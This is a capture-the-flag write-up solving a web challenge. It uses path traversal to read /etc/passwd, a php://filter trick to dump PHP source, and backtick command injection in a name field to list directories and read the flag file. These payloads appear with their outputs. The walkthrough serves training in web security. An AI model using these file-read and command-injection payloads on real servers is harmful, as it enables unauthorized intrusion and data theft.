## [See original writeup on site](https://barelycompetent.dev/post/ctfs/2021-04-11-ritsecctf/#dababyweb)

> Dababy wanted to share a message, but he seemed to put it too high up...
>
> 34.72.118.158:6284
>
> Author: Darkfowl

Navigating to the site, we see:

> "Dababy has his secret message hidden somwhere, but how can we read it?"
>
> * Dababy's Name Judgement
> * Dababy's Images

The first page, Dababy's name judgement, provides us a textbox that we can input data into, and it is echo'ed back to us with

> "**\<input\>** Is a Cool Name Lesss Go!"

So it seems like we are going to be able to exploit this, depending on how the service is written. Before I got into the textbox, I looked at the other page option, dababy's images.

When navigating there, notice the form of the URL:

* http://34.72.118.158:6284/fun1.php?file=suge

**/fun1.php?file=suge** is a dead giveaway for LFI on easy web challenges. Trying `/fun1.php?file=../../../../../etc/passwd` for example, we get back the `/etc/passwd` contents:

```none
root:x :0:0:root:/root:/bin/bash daemon:x :1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x :2:2:bin:/bin:/usr/sbin/nologin sys:x :3:3:sys:/dev:/usr/sbin/nologin sync:x :4:65534:sync:/bin:/bin/sync games:x :5:60:games:/usr/games:/usr/sbin/nologin man:x :6:12:man:/var/cache/man:/usr/sbin/nologin lp:x :7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x :8:8:mail:/var/mail:/usr/sbin/nologin news:x :9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x :10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x :13:13:proxy:/bin:/usr/sbin/nologin www-data:x :33:33:www-data:/var/www:/usr/sbin/nologin backup:x :34:34:backup:/var/backups:/usr/sbin/nologin list:x :38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x :39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x :41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x :65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x :100:65534::/nonexistent:/usr/sbin/nologin
```

When we enter a path to a file that errors, we are revealed the path of the currently running script. E.g, `/fun1.php?file=../../../../../etc/fooooo` gives:

> Warning: include(../../../../../etc/fooooo): failed to open stream: No such file or directory in /var/www/html/fun1.php on line 5
>
> Warning: include(): Failed opening '../../../../../etc/fooooo' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/fun1.php on line 5

So, since we gave LFI already, I tried another trick, which is using the `php://filter` to be able to base64 encode data. Combining this with the babove path, we are able to read the source code of the page:

```
http://34.72.118.158:6284/fun1.php?file=php://filter/convert.base64-encode/resource=/var/www/html/fun1.php`
```

Which gives:

```bash
PD9waHAKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihpc3NldCgkZmlsZSkpCnsKICAgICAgICBpbmNsdWRlKCRmaWxlKTsKfQplbHNlCnsKICAgICAgICBpbmNsdWRlKCJzdWdlIik7Cn0KPz4KCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+Cmh0bWwsIGJvZHl7d2lkdGg6IDEwMCU7IGhlaWdodDogMTAwJTsgcGFkZGluZzogMDsgbWFyZ2luOiAwfQpkaXZ7cG9zaXRpb246IGFic29sdXRlOyBwYWRkaW5nOiAwZW07IGJvcmRlcjogMXB4IHNvbGlkICMwMDB9CiNud3t0b3A6IDEwJTsgbGVmdDogMDsgcmlnaHQ6IDUwJTsgYm90dG9tOiA1MCV9CiNuZXt0b3A6IDA7IGxlZnQ6IDUwJTsgcmlnaHQ6IDA7IGJvdHRvbTogNTAlfQojc3d7dG9wOiA1MCU7IGxlZnQ6IDA7IHJpZ2h0OiA1MCU7IGJvdHRvbTogMH0KI3Nle3RvcDogNTAlOyBsZWZ0OiA1MCU7IHJpZ2h0OiAwOyBib3R0b206IDB9Cjwvc3R5bGU+Cgo8ZGl2IGlkPSJudyI+PGltZyBzcmM9Ii9pbWcvZGFiYWJ5NC5qcGciIHN0eWxlPSJ3aWR0aDoxMDAlO2hlaWdodDoxMDAlOyI+PC9kaXY+CjxkaXYgaWQ9Im5lIj48aW1nIHNyYz0iL2ltZy9kYWJhYnk1LmpwZyIgc3R5bGU9IndpZHRoOjEwMCU7aGVpZ2h0OjEwMCU7Ij48L2Rpdj4KPGRpdiBpZD0ic3ciPjxpbWcgc3JjPSIvaW1nL2RhYmFieTYuanBnIiBzdHlsZT0id2lkdGg6MTAwJTpoZWlnaHQ6MTAwJTsiPjwvZGl2Pgo8ZGl2IGlkPSJzZSI+PGltZyBzcmM9Ii9pbWcvZGFiYWJ5Ny5wbmciIHN0eWxlPSJ3aWR0aDoxMDAlOmhlaWdodDoxMDAlOyI+PC9kaXY+Cg==
```

So now we can decode the source of the website pages, which gives us this:

```php

<style type="text/css">
html, body{width: 100%; height: 100%; padding: 0; margin: 0}
div{position: absolute; padding: 0em; border: 1px solid #000}
#nw{top: 10%; left: 0; right: 50%; bottom: 50%}
#ne{top: 0; left: 50%; right: 0; bottom: 50%}
#sw{top: 50%; left: 0; right: 50%; bottom: 0}
#se{top: 50%; left: 50%; right: 0; bottom: 0}
</style>

<div id="nw"></div>
<div id="ne"></div>
<div id="sw"></div>
<div id="se"></div>
```

Likewise, we should be able to read the other page (`fun.php`), so trying `fun.php` gives us the following after base64 decoding:

```php

<html
<div style="background-image: url('/img/dababy2.jpg')"
height= 100%;
background-size: cover;
<head>
<title>DaBaby Cool Name Convertable</title>
</head>
<body>

<form action="fun.php" method="get">
Enter a cool name:

<input type="text" name="string" value="Your name!">
<input type="submit">

Dababy's Response:
</form>
= 40){
echo "Dababy says that's a long name";
}
else
{
if (strpos($name, 'ls') == false && (strpos($name, ';') !== false || strpos($name, '&') !== false || strpos($name, '|') !== false)) {

$_SESSION['count']++;
if ($_SESSION['count'] == 1){
echo "Dababy say's no peaking";
}
if ($_SESSION['count'] == 2){
echo "Dababy said no peaking";
}
if ($_SESSION['count'] >= 3){
echo '';
}
}
else
{
if (strpos($name, 'secr3t') !== false){
echo "Dababy say's no peaking";
}
else
{
$_SESSION['count'] = 0;
echo shell_exec('echo '.$_GET['string'].' | xargs /var/www/html/dababy.sh');
}
}
}
?>

</body>
</html>
```

Nice. So we can see the filter that is being used on the input text box, as well as the script that the input is being passed to/used by (`dababy.sh`). I took a peak at `dababy.sh` using the above methods, and it is just this:

```
echo ZWNobyAiJDEgSXMgYSBDb29sIE5hbWUgTGVzc3MgR28hIgo= | base64 -d
echo "$1 Is a Cool Name Lesss Go!"
```

So, if we go back to the name judgement page, we can try inputting something like so to get direct RCE:

```bash
`base64 dababy.sh``
```

As that will expand to:

```bash
echo "`base64 dababy.sh` Is a Cool Name Lesss Go!"
```

and will pass the above limitations on our name string. As proof:

* `http://34.72.118.158:6284/fun.php?string=%60base64+dababy.sh%60` (that payload) gives:

```bash
ZWNobyAiJDEgSXMgYSBDb29sIE5hbWUgTGVzc3MgR28hIgo= Is a Cool Name Lesss Go!
```

Now we just need to find the flag/message. Starting with where we currently are:

```bash
`pwd`
# gives "/var/www/html Is a Cool Name Lesss Go!"
```

Looking for the flag in there, was not successful. Trying one directory up:

```bash
`ls ../`
# gives "flag.txt Is a Cool Name Lesss Go!"
```

There it is. Just cat it:

```bash
`cat ../flag.txt`
# gives "RS{J3TS0N_M4D3_4N0TH3R_0N3} Is a Cool Name Lesss Go!"
```

Flag is `RS{J3TS0N_M4D3_4N0TH3R_0N3}`.

Original writeup (https://barelycompetent.dev/post/ctfs/2021-04-11-ritsecctf/#dababyweb).